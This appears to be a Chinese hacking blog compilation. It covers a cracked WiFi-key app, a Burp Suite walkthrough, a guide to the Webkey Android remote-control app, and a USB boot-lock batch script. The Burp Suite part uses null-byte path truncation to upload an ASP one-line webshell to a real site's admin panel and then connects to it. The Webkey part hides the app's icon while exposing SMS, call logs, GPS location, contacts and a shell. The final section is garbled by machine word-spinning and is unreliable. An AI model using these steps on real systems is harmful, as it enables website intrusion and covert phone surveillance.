可能被修改的太狠 了。万能钥匙从3.2.16开始更新了SO签名校验,我对SO修改这块技术太渣,分析了很久找不到绕过方法,就懒得分析了,所以直接使用空道大神的HOOK模块给通杀签名校验了,这样可能导致某些不支持HOOK的X86型号的安卓手机没办法搜到可用热点,但是支持绝大多数手机的。如果发现搜索不到可用的热点,建议使用我之前修改的旧版。万能钥匙这个软件没必要一直追新,实际上大多时候只是更新了个版本号,软件界面和广告,wifi密码服务器还是一样的,并不会影响使用效果,也不会能够多扫描到可用热点。

因法律法规及政策原因,已停止提供下载

中国骇客云之Burp suite网站攻击利器快速处理上传截断

Burp suite是一个安全测试框架,它整合了很多的安全工具,对于渗透的朋友来说,是不可多得的一款囊中工具包,今天笔者带领大家来解读如何通过该工具迅速处理“截断上传”的漏洞。如果对该漏洞还不熟悉,就该多去网上学习下。

由于该工具是通过Java写的,所以需要安装JDK,关于JDK的安装,笔者简单介绍下。基本是傻瓜化安装,安装完成后需要简单配置下环境变量,右键”我的电脑”->”属性”一>”高级”一>”环境变量”,在系统变量中查找Path,然后点击编辑,把JDK的bin目录写在path的最后即可。

通过CMD执行下javac看是否成功安装。安装配置成功则会显示下图信息。

这里的测试网址是笔者帮朋友测试某站点时获取的,登陆后台后可以发表新闻,但是只能上传图片,然后发现新闻的图片目录在upload/newsimg下。

后台有个”网站资料设置”的功能,可以自行定义新闻图片的路径,但是当尝试把新闻图片路径改为“upload/newsimg.asp/”时,上传图片竟然上传失败了,所以这种方法失效。

接下来我们尝试上传截断漏洞,可能大家经常用的是通过WSockExpert抓包,修改后通过nc来提交获取shell,但是大家会发现那样有点繁琐,我们看看今天的方法是多么高效!

QQ截图20170314135253.png

首先运行Burp suite允许burpsuite.jar,然后点击“proxy”标签,会发现burp suite默认的代理监听端口为8080,如果怕跟自己电脑上的某个端口冲突的话,可以点击“edit”进行编辑。笔者使用默认端口。

然后打开本地浏览器的代理设置的地方,IE一般为“工具”->“Internet选项”->“连接”->“局域网设置”,其他浏览器大致相同。

设置代理之后,我们到后台的某个上传新闻图片的地方上传一个图片木马,我这里的图片木马为asp一句话。

点击上传之后,我们到proxy的“history”选项,会发现该(本文来自危险漫步博客)网站的某个POST提交请求,我们选中该链接后,右键选择“send to repeater”。

我们会发现刚才提交的请求的数据包,那么我们看一下,有一项是上传路径的地方,我们以前进行截断上传的时候经常修改这个地方,这次也不例外,我们把上传路径改为”upload/shell.asp”后面有一个空格。

然后选择”hex”进入16进制编辑模块,将空格的16进制20改为00,即null。

然后点击上方的“go”即可进行数据包的提交,提交成功后会返回提交的路径,笔者通过菜刀就直接连接到一句话后门了。大家进行测试吧!

中国骇客云工具远控工具之手机远控远程控制你的Android手机

谈到远程控制android手机软件,很早之前,德国开发的Teamviewer软件即已经做到在电脑和手机之间灵活的双向切换控制操作,稍微略显不足的地方就是Teamviewer只支持安卓系统的手机。现在危险漫步要给大家介绍的这款软件是Webkey,不但支持安卓系统手机的操作,同时可以摆脱数据线连接,在无线的网络中远程控制手机。这里以三星手机T959为例(很普通的手机,请不要扔番茄和鸡蛋)。点击我们下载下来的webkey.apk安装文件(可以直接通过数据线连接手机安装或是有wifi的,安装一个豌豆荚连接下,双击安装),红色圆圈出来的即是已经安装的webkey软件。

2K5N03D2H2X{K8G`M{83E)I.jpg

这样就完成了安装过程。这个软件的一个优点就是可以通过网络来执行远程控制操作,摆脱数据线的困扰,只要你连接上wifi,即可以很方便的操作。当然不可缺少的条件就是你的手机必须是root权限,之前应该是有不少合约机,出厂并未激活root.貌似现在应该大多都会有root权限了。

下面需要对webkey进行简单的设置,取消开机启动。这样一来就可以避免每次手机在换电池或是做其他操作的过程中因为重启而每次开机都启动webkey。

去除手机上方状态栏显示webkey的图标状态,尽管去除了,但是webkey-样会在系统后台继续运行。完成开机和运行状态的一个设置。

只要保证“保持与androdwebkey的连接”和“允许浏览器中注册新用户”两个选项被选中就可以。“使用此IP地址连接DynDNS”,这个选项是你有获取公网地址,并将地址解析到外网的网站上,通过这个来访问。这边就跳过,有兴趣的朋友可以去注册一个域名站点进行测试。

点击“手机昵称设置”按钮进行对呢称的简单设置。帮你的手机设置一个好记的名称。往后通过浏览器远程控制手机的时候,访问的管理地址就是Webkey的域名加上你手机昵称路径,比如这里的jihn就是你的手机昵称了。既然可以通过wifi连接网络远程控制你的手机,webkey也给出了手机在网络中自动获取的一个IP地址,你一样可以通过输入172.18.14.233来管理访问你的手机,这里172.18.14.233就是你局域网分配给你手机的IP地址。下一步,也是比较重要的一步操作,那就是用户管理了。当然要设置成不是每个用户都可以远程控制你的手机。让我们自己动手来为手机创建一个新用户吧。这样设置完成后,我们将手机和电脑都连接到互联网上之后,就可以对手机进行远程控制了。不通过手机数据线的哦。上面提到的第5个设置步骤中有讲到局域网的分配给手机的IP地址,这里也可以通过外网远程控制你的手机,也就是获知手机的公网IP的话,一样可以是手机在家,人在公司或是路上,前提是要有wifi,呵呵,连接控制你的手机是没问题的。查看手机公网地址可以通过手机浏览器访问诸如ip138或是114best来查看手机所在的公网IP地址。以下简单示范局域网内如何远程控制手机。

打开桌面的浏览器访问androidwebkey或者是192.168.1.102,就可以看到远程控制管理界面了。图片显示的页面地址源显示未知,实际上是来自美国的IP地址,只是网站数据库没有收录而已,不影响操作控制。这边就提示要求我们输入用户名和密码,也就是我们在上述操作中谈到的第6个步骤中的用户和密码。在这个简洁的管理页面中,给大家分享下远程控制管理的功能。

(1)页面布局

大致的页面布局如下:顶端是功能导航条,页面左边显示的是手机的实时远控屏幕。右边是操作的功能菜单,右下方还有个远程聊天窗口。一起来了解一下每个标签页的具体应用。

(2)电话选项卡

这是比较常用的功能,同样是登录控制台后的第一个页面。设置完成之后可以在远程界面中用鼠标直接操作你的手机,譬如设置呼叫转移。

远控区最下方的一排功能键是Webkey为手机设置的,它等同于手机上的物理按键,更有趣的是,按键的键值还可以自行更改设置。

(3)功能菜单

右边的功能菜单也很丰富,基本的远程控制操作都可以在这里实现:远程键盘、打开网址、运行程序、手机信息、关闭进程等。个人比较喜欢的是远程键盘,相信可以用键盘代替手机的输入法或者是手写,速度应该是有很大的提升。像手机信息或是关闭进程一样是很实用的一些功能。

(4) GPS

这是个很强大的功能,可以起到防止手机被盗的效果。一旦你的手机被偷走,就可以知道手机的位置。呵呵,本人手机是不怎么好,应该是不会引起兴趣了,不过一样可以起到防范未然的效果,还可以定位最后已知手机的位置。而且提供了两种定位方式,在室外可以通过GPS卫星精确定位,倘若手机在室内还可以得到运营商定位。是不是很好用的GPS呢?

(5)短信和通话列表

这两个功能很简单,可以实现远程收发短信,查看通话记录详情。这样即使你手机忘记带也可以知道手机上的一些通话来往的情况,清楚是谁发了短信给你了。并且你可以远程控制你的手机给人家回复,这一切只需要你在电脑上通过网络直接在这个管理页面操作,简单方便,快捷,不需要再时不时的担心你的手机是否随身携带或是烦恼手写输入或是手机键盘给对方发短信的速度太慢。

(6) Net

这是一个很实用的功能,前提是要拥有root权限。通过net可以帮助你了解你的手机网络流量使用情况,包括各个网络接口,也就是和tcp,udp收发包一样的记录信息,按日统计,(7)通知和终端

这两个选项卡可能对普通用户用处不大。通知的意思是Webkey会每隔半分钟刷新一次,显示未读信息及未接电话,当操作触发时,手机会按照你预先设置的提醒方式来显示内容。终端就是一个远程命令行,你可以通过它在shell命令行下面运行Linux指令。

(8)导出

这个功能也是相当的不错。不过在当你手机失窃并基本回归无望的时候才用到它。它能帮你远程获取手机里的联系人、短信、通话记录,然后就像豌豆荚或是91助手一样可以导出这些信息并保存到本地电脑硬盘中。

(10)目录浏览和SD存储卡

这两个功能就相当于是利用wifi连接网络后,在局域网内进行远程文件管理器。采用了Aj aXplorer组件,让远程文件管理也很方便。

你还可以远程从你手机里下载SD卡里的任何文件传输或者拷贝到其他位置,如果是图片文件的话,还可以远程预览图片。

结尾再和大家聊一下以下几点事项:

这个应用软件属于高级玩家应用,需要一定的动手操作能力。因为有的功能需要对手机ROOT(合约机可能不太合适做这个操作了)。

要通过电脑对手机进行远程控制,那么你的手机必须保持网络在线并连通。通过网络控制手

机时,可能产生较大流量,请确定你有足够的流量,并保证手机实时在线。建议手机还是使用wifi连接互联网网络,这样一来和电脑可以很融洽的在一个网络内进行对话操作。

好了,希望大家感兴趣的话,可以自己尝试安装软件来试试看,有兴趣的话可以到我的博客上面与危险漫步进行指导和交流。

中国骇客云教你使用U盘制作进入系统的中钥匙

如今U盘容量越来越大而且价钱越来越低,因而普及率十分之高,置信大家们也动手一个。想不想用U盘作爲开启XP大门的钥匙来维护你的爱机呢?这样他人就会由于没有对应的U盘钥匙而无法开机,平安性自是大爲进步。制造办法十分复杂,也不需第三方软件,只是应用XP本身的工具一组战略,只需3步走。

第一步:先把U盘插上,然后双击翻开“我的电脑”,检查一下本人U盘在Windows XP中

所分配的盘符,我的盘符爲K,将恣意一团体文件复制到U盘的根目录中,我把一个照片放到了外面名字爲“U.JPG”。

第二步:翻开Windows XP的记事本顺序,输出一条命令:if not exist K:\u.jpg shutdown -s -f -t

3 -c”Sorry,你不是本机主人,回绝开机!”

W~$VUM7PH}NBEX_Z@OWH1_N.jpg

其中的“shutdown”既爲关机命令,“-s”爲关机的参数,“-r”爲重启,“-f”爲强迫关机,“-t”后门跟的是倒计时3秒,“-c”提示的关机阐明。本命令的意思是:假如在K盘上我不到“U.jpg”这个文件的话,就显示”Sorry,你不是本机主人,回绝开机!”,之后过3秒就自动关机。当然,假如你在第一步中复制的是“HackerXfiles.mp3”MP3文件也行,只需在相应的命令行中修正一下就可以了。然后将文本另存爲“Check.bat”。将寄存途径定位于Windows XP’的零碎盘C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup中(由于GroupPolicy文件夹默许爲隐藏,请先在“文件夹选项”中将其显示,文件的扩展名改爲bat

型,文件名可恣意改,如hackXfiles.bat。

第三步:翻开命令符,间接按Win+R,在外面输出“gpedit.msc”。找到“本地计算机”战略——“计算机配置”——“Windows设置”——“脚本(启动/关机)”,然后双击右侧中的“启动”项;在弹出的“启动属性”窗口中单击“添加”按钮,然后在弹出的“添加脚本”窗口中单击“旅游”按钮,Windows XP会自动定位于零碎盘C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup文件夹,单击迭中刚生成的Check.bat批处置文件后在单击“翻开”按钮;之后单击一次“启动”窗口中的“确定”按钮,最初封闭组战略窗口。

OK,一把完满的U盘钥匙曾经打造出来了,只需再启动XP之前将U盘插到主机上。等运转脚本时分会判别能否存在文件“U.JPG”,假如没有发现文件就会3秒后强迫关机,拿起手中的U盘赶快试一下吧!